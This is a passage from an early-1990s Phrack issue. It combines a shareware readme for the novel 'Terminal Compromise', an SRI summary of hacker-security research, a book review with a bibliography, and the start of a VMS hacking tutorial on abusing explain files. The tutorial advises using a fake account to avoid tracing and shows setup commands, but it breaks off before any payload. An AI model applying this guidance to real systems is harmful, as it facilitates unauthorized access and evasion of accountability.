again,  it never hit the New York Times Bestseller  List  either.
But that's OK, not many do.

Recently,  someone we know very well came up with a  real  bright
idea.   They suggested  that INTER.PACT Press take  the  unprece-
dented,  and maybe slightly crazy, step to put "Terminal  Compro-
mise" on the Global Network thus creating a new category for book
publishers.   The  idea is to offer  "Terminal  Compromise,"  and
perhaps  other titles at NOVEL-ON-THE-NET SHAREWARE(tm) rates  to
millions  of people who just don't spend a lot of time  in  book-
stores.   After  discussions with dozens of people -  maybe  even
more than a hundred - we decided to do just that.   We know  that
we're  taking a chance, but we've been convinced by  hackers  and
phreakers and corporate types and government representatives that
putting "Terminal Compromise" on the net would be a fabulous step
forward  into  the Electronic Age, (Cyberspace if you  will)  and
would encourage other publishers to take advantage of  electronic
distribution.   (It's still in the bookstores, though.)

To  the  best of our  knowledge,  no  semi-sorta-kinda-legitimate
-publisher has ever put a complete pre-published 562 page book on
the  network  as a form of Shareware.  So, I guess  we're  making
news  as  well as providing a service to the  world's  electronic
community.   The recommended NOVEL-ON-THE-NET SHAREWARE fees  are
outlined later (this is how we stay in business), so please  read
on.

WE KEEP THE COPYRIGHTS!

"Terminal  Compromise"  is  NOT  being  entered  into  the  public
domain.   It  is  being  distributed  electronically  so  hundreds
of thousands more  people  can enjoy it and  understand just where
we are heading with  our  omnipresent  interconnectedness  and the
potential dangers we face.  INTER.PACT Press  maintains  all copy-
rights to "Terminal Compromise" and does not, either intentionally
or  otherwise,  explicitly  or implicitly,  waive  any  rights  to
this  piece  of  work or  recourses  deemed  appropriate.  (Damned
lawyers.)

(C) 1991, 1992, 1993, Inter.Pact Press



                TERMINAL COMPROMISE - THE REVIEWS

" . . . a must read . . ."
          Digital News

"Schwartau  knows  about  networks and security  and  creates  an
interesting plot that will keep readers turning the pages."
          Computer World

"Terminal  Compromise  is  fast-paced  and  gripping.   Schwartau
explains complex technology facilely and without condescension."
          Government Computer News

"An  incredibly fascinating tale of international intrigue . .  .
action  .  . . characterization . . . deserves attention  .  .  .
difficult to imagine a more comprehensive resource."
          PC Laptop

"Schwartau   .  . . has a definite flair for  intrigue  and  plot
twists.   (He) makes it clear that the most important  assets  at
risk are America's right to privacy and our democratic ideals."
          Personal Identification News

"I  am  all  too familiar with the  appalling  realities  in  Mr.
Schwartau's book.  (A) potentially catastrophic situation."
          Chris Goggans, Ex-Legion of Doom Member.

"  . . .  chilling scenarios . . . ",  "For light summer  reading
with  weighty implications . . . ",  " . . .  thought  provoking,
sometimes chilling . . . "

Remember, it's only fiction.  Or is it?



                  TERMINAL COMPROMISE: SYNOPSIS

"It's all about the information . . . the information."
                         From "Sneakers"

Taki Homosoto, silver haired Chairman of Japan's huge OSO  Indus-
tries,  survived Hiroshima; his family didn't. Homosoto  promises
revenge  against the United States before he dies.  His  passion-
ate, almost obsessive hatred of everything American finally comes
to a head when he acts upon his desires.

With  unlimited resources, he comes up with the ultimate  way  to
strike back at the enemy. Miles  Foster, a brilliant 33 year old
mathematician   apparently isn't  exactly  fond of America either.
The  National  Security  Agency wanted  his  skills, but his back-
ground and "family" connections kept him from advancing within the
intelligence  community.  His  insatiable - borderline psychotic-
sex drive  balances  the intensity  of waging war against his own
country to  the  highest bidder.

Scott  Mason,  made  his fortune selling high tech  toys  to  the
Pentagon.   Now as a New York City Times reporter,  Mason  under-
stands  both  the good and the evil of technology  and  discovers
pieces  of  the terrible plot which is designed  to  destroy  the
economy of the United States.

Tyrone  Duncan, a physically huge 50-ish black senior  FBI  agent
who suffered through the Hoover Age indignities, befriends  Scott
Mason.  Tyrone provides the inside government track and confusion
from competing agencies to deal with the threats.  His altruistic
and  somewhat pure innate view of the world finally makes him  do
the right thing.

As  Homosoto's  plan evolves, Arab zealots,  German  intelligence
agents and a host of technical mercenaries find the weaknesses in
our  techno-economic  infrastructure.   Victims  find  themselves
under  attack by unseen adversaries; Wall Street suffers  debili-
tating  blows; Ford and Chrysler endure massive shut downs.   The
U.S. economy suffers a series of crushing blows.

From  the White House to the Pentagon to the CIA to the  National
Security Agency and FBI, a complex weaving of fascinating politi-
cal characters find themselves enmeshed a battle of the New World
Order.   Sex,  drugs, rock'n'roll: Tokyo,  Vienna,  Paris,  Iraq,
Iran.  It's all here.

Enjoy reading "Terminal Compromise."



                     SHAREWARE - NOVEL FEES:

We hope that you enjoy "Terminal Compromise" as much as  everyone
else  has, and that you will send us a few shekels  according  to
the following guidelines.

The  NOVEL-ON-THE-NET SHAREWARE(tm)  fees for us as a  publishing
company  are no different than the fees for software  application
shareware publishers, and the intent is the same.  So please, let
us continue this form of publishing in the future.


NOVEL-ON-THE-NET SHAREWARE Fees For The People:

The suggested donation for individuals is $7.  If you hate Termi-
nal Compromise after reading it, then only send $6.50.  If you're
really, really broke, then tell a hundred other people how  great
it was, send us a rave review and post it where you think  others
will enjoy reading it, too.  If you're only a little broke,  send
a few dollars.  After all, this is how we stay in business.  With
each  registration, we will also send a FREE! issue of  "Security
Insider Report," a monthly security newsletter also published  by
Inter.Pact Press.


NOVEL-ON-THE-NET SHAREWARE Fees For Businesses:

We  hope  that  you put "Terminal Compromise"  on  your  internal
networks so that your employees will have the chance to enjoy  it
as well.  It's a great way to increase security awareness amongst
this  country's 50,000,000 rank and file computer  users.   Plus,
it's a hell of a good read.

One  company  plans  on  releasing  a  chapter  every  few   days
throughout its E-Mail system as a combination of security  aware-
ness  and employee 'perc'.  Try it; it works and  your  employees
will  appreciate it.  Why?  Because they'll all talk about  it  -
bringing security awareness to the forefront of discussion.

FEES

Distribution for up to 100 people on a single network:  $   500
     (Includes 1 Year subscription to "Security Insider Report.")

Distribution for up to 1000 people on a single network: $  3000
     (Includes  10  1  Year subscriptions  to  "Security  Insider
     Report.")

Distribution for up to 2500 people on a single network: $  6250
     (Includes  1  Year  electronic  Corporate  site  license  to
     "Security Insider Report.")

Distribution for up to 5000 people on a single network: $  10000
     (Includes  1  Year  electronic  Corporate  site  license  to
     "Security Insider Report.")

Distribution for up to 10000 people on a single network: $ 15000
     (Includes  1  Year  electronic  Corporate  site  license  to
     "Security Insider Report.")

Distribution for up to 25000 people on a single network: $ 25000
     (Includes  1  Year  electronic  Corporate  site  license  to
     "Security Insider Report.")

Distribution for more than that - Please call and we'll figure it
out.   Would  you like us to coordinate  a  special  distribution
program  for you?  Would you like in Postscript or  other  visual
formats?  Give us a call and we'll see what we can do.

                       * * * * * * * * * *
     Please  DO NOT UPLOAD AND DISTRIBUTE  "Terminal  Compromise"
     into  your networks unless you intend on paying  the  recom-
     mended fees.

                       * * * * * * * * * *


NOVEL-ON-THE-NET SHAREWARE Fees for Universities:  FREE!

"Terminal Compromise" has been used by many schools and universi-
ties  as a teaching supplement.  Recognized Educational  institu-
tions  are entitled to use "Terminal Compromise" at NO  COST,  as
long  as you register with us that you are doing so. Please  pro-
vide: School name, address, etc., the course, the instructor, and
the  reason for using it.  Also, we'd like to hear from  you  and
tell us how it went. Thanks.


SHAREWARE-NOVEL Fees for Local, State and Federal Governments.

     You have the money.  :-)  Please send some back by following
     the same fee guidelines as those for businesses.

     Government  employees:  You are The People - same  fees  are
     appreciated.

                       * * * * * * * * * *

     Agencies: Do not upload and distribute "Terminal Compromise"
     unless you plan on paying the fees.

                      * * * * * * * * * * *


NOVEL-ON-THE-NET SHAREWARE Fees for the International Community
     Make payments in $US, please.

GETTING TERMINAL COMPROMISE:

     You  can get your copy of Terminal Compromise from a lot  of
sites; if you don't see it, just ask around.  Currently the novel is
archived at the following sites:

                  ftp.netsys.com
                  /pub/novel

                  wuarchive.wustl.edu
                  /doc/misc

                  soda.berkeley.edu
                  /pub/novel

It  consists of either 2 or 5 files, depending upon how  you  re-
ceive it. (Details at end of this file.)

Feel  free to post all five files of "Terminal  Compromise"  any-
where  on the net or on public or private BBS's as long  as  this
file accompanies it as well.


Please forward all NOVEL-ON-THE-NET SHAREWARE fees to:

     INTER.PACT PRESS
     11511 Pine St. N.
     Seminole, FL., 34642

Communications:

     Phn: 813-393-6600
     Fax: 813-393-6361
     E-Mail: p00506@psi.com
             wschwartau@mcimail.com

We will accept checks, money orders, and cash if you must, and we
mean  if you must.  It's not the smartest thing in the  world  to
send  cash through the mail.  We are NOT equipped at  this  point
for credit cards.

Remember, "Terminal Compromise is copyrighted, and we will vigor-
ously pursue violations of that copyright.  (Lawyers made us  say
it again.)

If you ABSOLUTELY LOVE "Terminal Compromise," or find that  after
50 pages of On-Screen reading, you may want a hard copy for  your
bookshelf.   It  is  available  from  bookstores  nationwide  for
$19.95,  or from Inter.Pact directly for $19.95 + $3.50  shipping
and handling.  If you first paid the $ 7 NOVEL-ON-THE-NET  SHARE-
WARE  fee, send in proof and we'll deduct $ 7 from the  price  of
the hard copy edition.

ISBN: 0-962-87000-5

Enjoy "Terminal Compromise" and help us make it an easy  decision
to put more books on the Global Network.

Thank you in advance for your attention and your consideration.



The Publishers,
INTER.PACT Press



               READING "TERMINAL COMPROMISE"

"Terminal Compromise" will come to you in one of two ways:

1)  Original Distribution Format From Inter.Pact  Press  contains
only two -2- files.

          TC_READ.ME     13,927 Bytes

That is this file you  are now reading and  gives an overview of
"Terminal  Compromise" and how NOVEL-ON-THE-NET Shareware works.

          TERMCOMP.ZIP   605,821 Bytes

This is the total content of "Terminal Compromise".  Run  PKUNZIP
to expand the file into four -4- readable ASCII files.

2)   Some locations may choose to post "Terminal  Compromise"  in
readable  ASCII form.  There will then be four files in  addition
to the TC_READ.ME file.

          TERMCOMP.1     250,213 Bytes

contains the Introduction and Chapters 1 through 5.

          TERMCOMP.2     337,257 Bytes

contains Chapters 6 through 14.

          TERMCOMP.3     363,615 Bytes

contains Chapters 15 through 21.

          TERMCOMP.4     388,515 Bytes

contains Chapters 22 through 30 and the Epilogue.


     Enjoy "Terminal Compromise!" and pass it on to whomever  you
     think would enjoy it, too!

     Thank You!

****************************************************************************

THE STATE OF SECURITY IN CYBERSPACE

SRI International conducted a worldwide study in 1992 of a broad range of
security issues in "cyberspace."  In brief, cyberspace is the full set of
public and private communications networks in the United States and elsewhere,
including telephone or public switched telephone networks (PSTNs), packet data
networks (PDNs) of various kinds, pure computer networks, including the
Internet, and wireless communications systems, such as the cellular telephone
system.  We did not address security vulnerabilities associated with
classified, secure communications networks used by and for governments.

The study was conducted as part of our ongoing research into the
vulnerabilities of various software components of cyberspace.  Our approach was
to conduct research through field interviews with a broad range of experts,
including people we characterize as "good hackers," about security issues and
vulnerabilities of cyberspace and the activities of the international
"malicious hacker" community.

While the specific results of the study are proprietary to SRI, this brief
report summarizes our general conclusions for the many individuals who kindly
participated in our field interviews.  As we indicated during our field
interviews, the original research for this project was not part of any other
kind of investigation, and we have not revealed the identify of any of our
respondents.

The study aimed to understand "malicious hackers," that is, people who have and
use the technical knowledge, capability, and motivation to gain unauthorized
access, for various reasons, to systems in cyberspace.  It is important to
understand that by no means all hackers are malicious nor does most hacking
involve unauthorized access to cyberspace systems; indeed, only a small
fraction of computer hacking involves such activities but gives hacking an
otherwise undeserved bad reputation.  While we attempted to focus on technical
(software) vulnerabilities, our interviews led us to look more at the broader
motivations and different approaches to cracking into various networks and
networked systems.

MAIN CONCLUSIONS

Our main conclusion is that social, organizational, and technological factors
still combine in ways that make much of cyberspace relatively vulnerable to
unauthorized access.  The degree of vulnerability varies from one type of
communications system to another.  In general, the PSTN is the least vulnerable
system, the PDNs are somewhat more vulnerable than the PSTN, the Internet is
relatively insecure, and as is widely known, the cellular phone system is the
most vulnerable of the four major areas we addressed.

The main vulnerabilities in most communications networks involves procedural,
administrative, and human weaknesses, rather than purely technical
vulnerabilities of network management, control systems, and hardware, and
software.  There are technical vulnerabilities--poor system design and specific
security flaws in software--but they are mainly exploitable because of the
above problems.

Highlights of the study's conclusions include:

o Malicious attacks on most networks and networked systems cannot be completely
prevented, now or in the future.  More than enough information is publicly
available to hackers and other technically-literate people to preclude attempts
at prevention of intrusions.

o It is possible individuals or groups could bring down individual systems or
related groups of systems, on purpose or by accident.  However, security is
generally improving as a result of dealing with past threats and challenges to
system security.  For instance, responses to the most recent serious threat to
the Internet, the so-called Internet Worm in 1989, included improved security
at sites vulnerable to this sort of worm.

o We found no evidence that the current generation of U.S. hackers is
attempting to sabotage entire networks.  On the contrary, doing so is
inconsistent with the stated ethics and values of the hacker community, which
are to explore cyberspace as a purely intellectual exercise without malicious
intent or behavior.  Some individuals who operate outside this informal ethical
framework, however, can and do damage specific systems and occasionally use
systems for personal gain or vindictive activities.

o There is some evidence that the newest generations of hackers, may be more
motivated by personal gain than the traditional ethic of sheer curiosity.  This
development could mean that networks and networked systems could become more
likely targets for attacks by hardened criminals  or governments' intelligence
services or their contractors (i.e., employing malicious hackers).  This threat
does not appear to be significant today but is a possible future scenario.

o The four major areas of vulnerability uncovered in our research have little
or nothing to do with specific software vulnerabilities per se.  They relate
more to the ways in which hackers can gain critical information they need in
order to exploit vulnerabilities that exist because of poor systems
administration and maintenance, unpatched "holes" in networks and systems, and
so on.
- The susceptibility of employees of businesses, public organizations, schools,
and other institutions to "social engineering" techniques
- Lax physical and procedural controls
- The widespread availability of non-proprietary and of sensitive and
proprietary information on paper about networks and computer systems
- The existence of "moles," employees of communications and computer firms and
their suppliers who knowingly provide proprietary information to hackers.

o The vulnerabilities caused by shortcomings in software-based access controls
and in hardware-related issues constitute significantly lower levels of risk
than do the four areas discussed above on more secure networks such as the PSTN
and PDNs.  However, on the Internet and similar systems, software-based access
controls (for instance, password systems) constitute significant problems
because of often poor system maintenance and other procedural flaws.

RECOMMENDATIONS

Based on our research, we recommend the following:

1. Protection of organizational information and communications assets should be
improved.  Issues here range from those involving overall security systems to
training employees and customers about maintenance of security on individual
systems, handling and disposition of sensitive printed information, and dealing
with "social engineering."

2. Techniques used to protect physical assets should be improved.  For example,
doors and gates should be locked properly and sensitive documents and equipment
guarded appropriately.

3. Organizations and their employees should be made aware of the existence and
role of moles in facilitating and enabling hacker intrusions, and care taken in
hiring and motivating employees with the mole problem in mind.

4. Software- and hardware-based vulnerabilities should also be addressed as a
matter of course in systems design, installation and maintenance.

5. Organizations concerned with information and communications security should
proactively promote educational programs for students and parents about
appropriate computer and communications use, personal integrity and ethics, and
legitimate career opportunities in the  information  industry, and reward
exemplary skills, proficiency and achievements in programming and ethical
hacking.

6. Laws against malicious hacking should be fairly and justly enforced.

SRI's believes that the results of this study will provide useful information
to both the operators and users of cyberspace, including the hacker community.
We are planning to continue our research in this area during 1993 within the
same framework and conditions (i.e., anonymity of all parties and
organizations) as we conducted the 1992 research.  We invite hackers and others
who are interested in participating in this work through face-to-face,
telephone or email interviews should contact one of the following members of
the SRI project team:

A. J. Bate
SRI International
Phone:  415 859 2206
Fax:  415 859 3154
Email:  aj_bate@qm.sri.com,
             aj@sri.com

Stuart Hauser
SRI International
Phone:  415 859 5755
Fax:      415 859 3154
Email:   stuart_hauser@qm.sri.com

Tom Mandel
SRI International
Phone:  415 859 2365
FAX:  415 859 7544
Email:   mandel@unix.sri.com

*****************************************************************************

--------------------------------------------------------------------------------


                         ==Phrack Magazine==

              Volume Four, Issue Forty-Two, File 5 of 27


                           //   //  /\   //   ====
                          //   //  //\\ //   ====
                         ==== //  //  \\/   ====

                     /\   //  // \\    //  /===   ====
                    //\\ //  //   //  //   \=\   ====
                   //  \\/    \\ //  //   ===/  ====

                                (cont)

******************************************************************************

    `'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'
    '`                                            '`
    `'             Approaching Reality:           `'
    '`             ~~~~~~~~~~~~~~~~~~~~           '`
    `'  A review of the new book Approaching Zero `'
    '`  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ '`
    `'                by Aleph One                `'
    '`                ~~~~~~~~~~~~                '`
    `'                                            `'
    '`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`

     When I started to read this book, I expected to read one more of the
series of books that claim to be the "definitive history of the computer
underworld" and the "first book to define the technological subculture of
phreaking, hacking, and virus writing".  After all what does a guy that
writes for GQ, The Hollywood Reporter, Variety and Time know about the
computer underground?  Well to my surprise the authors, Paul Mungo and
Bryan Clough (a member of the Virus Strategy Group, which is coordinated by
New Scotland Yard's Computer Crime Unit), did a pretty good job at presenting
the facts as they are.  For the first time I heard a reporter and a
computer crime expert give real figures at how much computer crime has
really cost.  Other than a few minor technical errors and the fact that
they fail to mention some people and groups (especially in the virus
section), the book was enjoyable to read.

    The book covers the history of the underground starting with its
beginnings in the 60's, from phreaking to the adventures of Captain
Crunch and the rest of the bunch to the not so long ago Operation Sundevil
and the raids all over the country on members of the LOD, MOD and DPAC.
It also goes through the events that led to the German hackers spy trials,
and to the new generation of virus writers that are creating the new kind
of living organisms that roam cyberspace.  They also discuss the gray
scale that categorizes hackers, from the good hackers to the bad to the
ones not that bad... those who are in it for profit and those who are
in it to learn.  Hopefully all the readers of the book, hackers, security
specialists, reporters and the general public will get a better
understanding of what motivates hackers to do what they do by learning
where they come from. To the hackers let them learn not to repeat their
past errors.


     I hope that the time of raids and sting operations has passed, but
the late developments in the Washington 2600 meeting have pulled a shadow
over my hopes.  Has no one learned?  Have the SS and FBI nothing better to
do?  Just a few moths back someone pulled one of the greatest scams of all
by setting up a fake ATM and stealing a few thousand dollars.  These are
the kind of people the authorities should be after.  And to the hacker,
don't sell yourself!  Remember this is a learning trip, once you start
forgetting to learn and start making money out of it, it is just another
job, an illegal one at that.

     Approaching Zero was an exciting and interesting surprise.  It has
given me the hint that maybe someone out there understands and I hope that
everyone that reads it (and you must, you must read and learn all you can)
will also understand.  I just leave you with these words:  Hacking comes
from the heart - sometimes in the form of an obsession, sometimes in the
form of a hobby - once that dies, there is nothing left to do.  No more
traveling trough the nets!  No more exploring new systems!  You might as
well turn the power off.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

 What fallows is a list of books, papers and articles for those that
want to know a little more of how the media portrays us, and a little more
about the story of hacking in general.


     Books:
     ~~~~~~

   - "Approaching Zero" by Paul Mungo & Bryan Clough. Random House
   1992.

   - "Beating the System" by Owen Bowcott & Sally Hamilton. London:
    Bloomsbury, 1990.

   - "Computer Viruses - A High-Tech Disease" by Ralf Burger. Grand
    Rapids, MI: Abacus, 1988.

   - "The Hackers' Handbook" by Hugo Cornwall. London: Century
    Communications, 1985.

   - "Computers Under Attack" by Peter Denning. Addison Wesley, 1990.

   - "Profits of Deceit" by Patricia Franklin. London: William
    Heinemann, 1990.

   - "Cyberpunk" by Katie Hafner & John Markoff. London: Fourth Estate,
    1991.

   - "Out of the Inner Circle" by Bill Landreth (aka The Cracker).
    Redmond, WA.: Tempus Books, 1985.

   - "Sillicon Valley Fever" by Judith K. Larsen & Everett M. Rogers.
    London: George Allen & Unwin, 1985.

   - "Computer Viruses" by Ralph Roberts. Greensboro, NC: Compute! Books,
    1988.

   - "The Cuckoo's Egg" by Clifford Stoll. New York: Doubleday, 1989.

   - "Spectacular Computer Crimes" by Buck BloomBecker. Dow Jones-Irwin,
    1990.

   - "The New Hacker's Dictionary" by Eric Raymond. MIT Press, 1983.

   - "The Hacker Crackdown" by Bruce Sterling. Bantam Books, 1992.

   - "The Little Black Book of Computer Viruses" by Mark Ludwig. American
    Eagle Publications, 1991.

   - "Artificial Life" by Steven Levy. Panthenon, 1992. (For those virus
    writers out there, use your tallen to create life.)


     Articles & Papers:
     ~~~~~~~~~~~~~~~~~~

   - "Crime and Puzzlement" by John Perry Barlow. Whole Earth Review,
    Fall 1990: 44-57.

   - "The Casino Virus - Gambling with Your Hard Disk" by Jim Bates.
    Virus Bulletin, March 1991: 15-17.

   - "The TP Viruses" by Vesselin Bontchev. Postings to Virus-L 1990.

   - "In Defense of Hackers" by Craig Bromberg. The New York Times
    Magazine, April 21, 1991.

   - "Bulgaria - The Dark Country" by Bryan Clough. Virus Bulletin,
    December 1990: 9-11.

   - "Voice Mail Computer Abuse Prosecution: United States v. Doucette
    a/k/a Kyrie" by William J. Cook. Safe Computing Proceedings of the
    Fourth Annual Computer Virus & Security Conference, 1991, Organized
    by National Computing Corporation.

   - "Invasion of the Data Snatchers!" by Philip Elmer-De Witt. Time,
    September 26, 1988: 63.

   - "Data Exchange and How to Cope with This Problem: The Implication
    of the German KGB Computer Espionage Affair" by Hans Gliss. Paper
    presented at Securicom Italia, October 1989.

   - "The Implications of the SPANet Hack." Computers Fraud & Security
    Bulletin, Vol. 10, No. 2, 1987.

   - "The Brain Virus: Fact and Fantasy" by Harold J. Highland. Computers
    & Security, August 1988: 367-370.

   - Computer Viruses - A Post Modern." Computer & Security, April 1988:
    117-184.

   - "Terminal Delinquents" by Jack Hitt & Paul Tough. Esquire, December
    1990.

   - "The Social Organization of the Computer Underground" by Gordon R.
    Meyer. M.A. Thesis Submitted to the Graduate School, August 1989.

   - "Satanic Viruses" by Paul Mungo. GQ, February 1991: 126-130.

   - "Secrets of the Little Blue Box" by Ron Rosenbaum. Esquire, October
    1971, Collected in Travels with Dr. Death. New York: Viking Penguin,
    1991.

   - "The Worm Program - Early Experience with a Distributed
    Computations" by John F. Shoch. Communications of the ACM, Vol. 25,
    No. 3, March 1982.

   - "The Search for Den Zuk" by Fridrik Skulason. Virus Bulletin,
    February 1991: 6-7.

   - "Crisis and Aftermath" by Eugene H. Spafford. Communications of the
    ACM. Vol. 32, No. 6, June 1989.

   - "GURPS Labor Lost: The Cyberpunk Bust" by Bruce Sterling, Effector,
    September 1991: 1.

   - "Stalking the Wily Hacker" by Clifford Stoll. Communications of the
    ACM. Vol. 31, No. 5, May 1988.

   - "The Kinetics of Computer Virus Replication." by Peter S. Tippett.
    FundationWare, March 1990.

   - "The General and Logical Theory of Automata" by John L. von Neumann.
    Hixon Symposium, September 1948.

   - "Here Comes the Cyberpunk" by Eden Restored. Time, February 8, 1993:
    58-65.

   - "Surfing Off the Edge" by Richard Begar. Time, February 8, 1993: 62.

   - "Can Hackers Be Sued for Damages Caused by Computer Viruses?" by
    Pamela Samuelson. Communications of the ACM. Vol. 32, No. 6, June
    1989.

   - "Viruses and Criminal Law" by Michael Gemignani. Communications of
    the ACM. Vol. 32, No. 6, June 1989.

   - "Password Cracking: A Game of Wits" by Donn Seeley. Communications
    of the ACM. Vol. 32, No. 6, June 1989.

   - "The Cornell Commission: On Morris and the Worm" by Ted Eisenberg,
    David Gries, Juris Artmanis, Don Holcomb, M. Stuart Lynn & Thomas
    Santoro. Communications of the ACM. Vol. 32, No. 6, June 1989.

   - "Desperately Seeking Cyberspace" by Paul Saffo. Personal Computing,
    May 1989: 247-248.

   - "Secrets of the Software Pirates" by Bylee Gomes. Esquire, January
    1982: 58-64.

   - "Trouble in Cyberspace" by Willard Uncapher. The Humanist,
    September/October 1991: 5-14,34.

   - "Is Computer Hacking a Crime?" Capture of a discussion held on the
    WELL. Harper's Magazine, March 1990: 45-57.

   - "The United States vs. Craig Neidorf" by Dorothy E. Denning.
    Communications of the ACM, Vol. 34, No. 3, March 1991: 24-32.

   - "Colleagues Debate Denning's Comments." Communications of the ACM.
    Vol. 34, No. 3, March 1991: 33-41.

   - "Denning's Rebutal" by Dorothy E. Denning. Communications of the
    ACM. Vol. 34, No. 3, March 1991: 42-43.

   - "Coming into the Country" by John P. Barlow. Communications of the
    ACM. Vol. 34, No. 3, March 1991: 19-21.

   - "Off the Hook" by Julian Dibbell. Village Voice, August 21, 1990: 8.

   - "On Line and Out of Bounds" by Julian Dibbell. Village Voice, July
    24, 1990:27-32.

  - "Hi-Tech Mall Crawl" by Julian Dibbell. Village Voice. March 1990: 12

  - "Samurai Hackers" by Lynda Edwards. Rolling Stone, September 19,
   1991: 67-69.

  - "Crackdown on hackers `may violate civil rights'" by Dan Charles.
   New Scientist, July 21, 1990: 22.

  - "United States v. Zod." The Economist, September 1, 1990: 23.

  - "Drop the Phone." Time, January 9, 1989: 49.

  - "Computer Recreations (Core War)" by A. K. Dewdney. Scientific
   American, May 1984: 14-21.

  - "Computer Recreations (Core War)" by A. K. Dewdney. Scientific
   American, March 1985: 14-23.

  - "Computer Recreations (Core War)" by A. K. Dewdney. Scientific
   American. March 1989: 110-113.

  - "Computer Security: NAS Sounds the Alarm" by Eliot Marshall. Science,
   Vol. 250: 1330.

  - "Students Discover Computer Threat" by Gina Koda. Science, Vol. 215,
   5 March, 1982: 1216-1217.

  - "A nationwide Computer-Fraud Ring Is Broken Up." The New York Times
   National, Sunday, April 19, 1992.

  - "Hackers: Is a Cure Worse than the Disease?" by Mark Lewyn. Business
   Week, December 4, 1989: 37-38.

  - "Computer Hacking Goes to Trail" by William F. Allman. U.S. News &
   World Report, January 22, 1990: 25.

  - "Morris Code: by Katie Hafner. The New Republican, February 19, 1990:
   15-16.

  - "Hackers Intentions Key to Court Case" by David Lindley. Nature. Vol.
   340, August 3, 1989: 329.

  - "Problems of Security" by David Lendley. Nature. Vol. 340. July 27,
   1989: 252.

  - "Hostile Takeovers" by Paul Wallich. Scientific American, January
   1989: 22-23.

  - "The Worm's Aftermath" by Eliot Marshall. Science, Vol. 242, November
   25, 1988: 1121-1122

  - "Researcher Fear Computer Virus' Will Slow Use of National Network"
   by Calvin Sims.  The New York Times, Monday, November 14, 1998: B6.

  - "Networked Computers Hit by Intelligent `Virus'" by Joseph Palca &
   Seth Shulman. Nature, Vol. 336, November 10, 1988: 97.

  - "The Science of Computing: Computer Viruses" by Peter J. Denning.
   American Scientist, Vol. 76, May-June 1988:236-238.

  - "Cyberpunks and the Constitution" by Philip Elmer-Dewitt. Time, April
   8, 1991:81.

  - "Plan to outlaw hacking." Nature, Vol. 341, October 19, 1989: 559.

  - "Computer System Intruder Plucks Passwords and Avoids Detection" by
   John Markoff. The New York Times National, Monday, March 19, 1990.

  - "Networked Computer Security" by S.J. Buchsbaum. Vital Speeches of
   the day. December 15, 1991: 150-155.

  - "Halting Hackers." The Economist. October 28, 1989: 18.

  - "Revenge of the Nerds" by Nocholas Martin. The Washington Monthly,
   January 1989: 21-24.

  - "Greater awareness of security in aftermath of computer worm" by Seth
   Shulman & Joseph Palce. Nature, Vol. 336, November 1988: 301.

  - "Avoiding Virus Hysteria" by Patrick Honan. Personal Computing, May
   1989: 85-92.

*****************************************************************************

             {----------------------------------------------}
             {                                              }
             {       VMS/VAX Explain Files Explained        }
             {                     or                       }
             {      Security Holes in the VAX and DCL       }
             {                                              }
             {            By: The Arctic Knight             }
             {                                              }
             {----------------------------------------------}

     VAX/VMS hacking has declined in popularity over the years due to the
abundance of UNIX machines now available. It has even gotten bad press from
fellow hackers. Included in this file is a security hole the size of , oh,
any of the older IBM mainframes. With a little curiosity, persistence, and
down right stubbornness I came across this rather obvious hole in the system.
However, this hole may be so obvious that it has remained relatively hidden
until now, especially since the decline of DCL users.
     On most VAX systems, there is something called explain files.  These are
usually help files that are made up by the system operators or borrowed from
somewhere to help better explain the way certain features of the system work,
whether they be general VAX commands, or system-specific programs.
     When you are in your account (Presumably, a fake one, as this can be
tracked down if you are foolish) type:

$ explain index

     and you will get a list of all the explain files on your system. Go ahead
and take a look around these just to get a feel of what it looks like.  It
should be a menu driven list of text files to view or programs to run(!!!).
     Most system operators only set this up to show various text files
describing commands like mentioned above. However, DCL .com files can be run
from explain files as well. Now comes the fun. Many systems will also allow
users to set up there own explain file. A really nice way to make it easy for
other users to view text files or run programs that you have set for group or
world access.
     The first thing someone needs to do is make a file called INTRO.LKT which
will contain whatever introduction text that you would like displayed before
your explain file menu is displayed(i.e. you might have a description of
yourself, your duties, or a funny poem, or WHATEVER YOU WANT THAT CAN BE
CONTAINED IN A TEXT FILE!!!!)
     You can use any editor to do this like EDT(a line editor) or TPU(a full
screen editor). You will need to type something along these lines to create the
file:

$set vt=100         !if using a full screen editor like TPU
$edit/tpu intro.lkt

     After you are finished typing in the file, if you used TPU (A much better
choice than EDT), you press <CONTROL-Z> to save the file. Now you must create
a file called INDEX.LKI which will contain the file directories, filenames,
and short descriptions of the files that you want to have displayed. You do
this in the same manner as above, by entering an editor, and creating the file.

$edit/tpu index.lki

     Now, in this file the lines should look like the following:
(File Directory)         (Filename)      (File Description)

Phrack41.txt  A complete copy of Phrack 41 for your enjoyment.
User:[aknight.hack]vms.txt A guide to hacking VMS systems.
Temp$1:[aknight.ftp]ftplist.txt A list of FTP servers in-state.

     Now, to explain these three lines. The first one will look for the program
in your main directory. The second line will look for the program listed after
it on the device called USER and in the HACK directory within the AKNIGHT
directory. The final line will look on the device called TEMP$1 in the FTP
directory within the AKNIGHT directory. Adding DCL programs will be explained
in a minute, but first lets get this up and running.
     Now, that you have typed in the text files you want, and saved this file
you need to set the protection on your main directory and any others that need
accessing like the text files to group and world access. For the above example
one would want to type(assuming you are in your main directory):

$set prot=(g:re,w:re) user:[000000]aknight.dir     !This is my main directory
$set prot=(g:re,w:re) user:[aknight.hack]
$set prot=(g:re,w:re) temp$1:[000000]aknight.dir   !My second storage device
$set prot=(g:re,w:re) temp$1:[aknight.ftp]
$set prot=(g:r,w:r)   phrack41.txt                 !Giving privs to read only
$set prot=(g:r,w:r)   user:[aknight.hack]vms.txt
$set prot=(g:r,w:r)   temp$1:[aknight.ftp]ftplist.txt

     Now, if you type:

$explain aknight              ! (my username in this instance,your normally)

     You should get a print out to screen of your INTRO.LKT file and then a
message along the lines of "Hit <return> to continue". When you hit return a
menu will appear very similar to the normal explain file menu except with your
files listed and their descriptions which were accessed by the computer from
your INDEX.LKI file. It would look like this(or something similar) in the above
example.

   {a print out of my INTRO.LKT file...}

Hit <RETURN> to continue

                             EXPLAIN AKNIGHT
================================================================================
(A) PHRACK41  T-A complete copy of Phrack 41 for your enjoyment.
(B) VMS       T-A guide to hacking VMS systems.
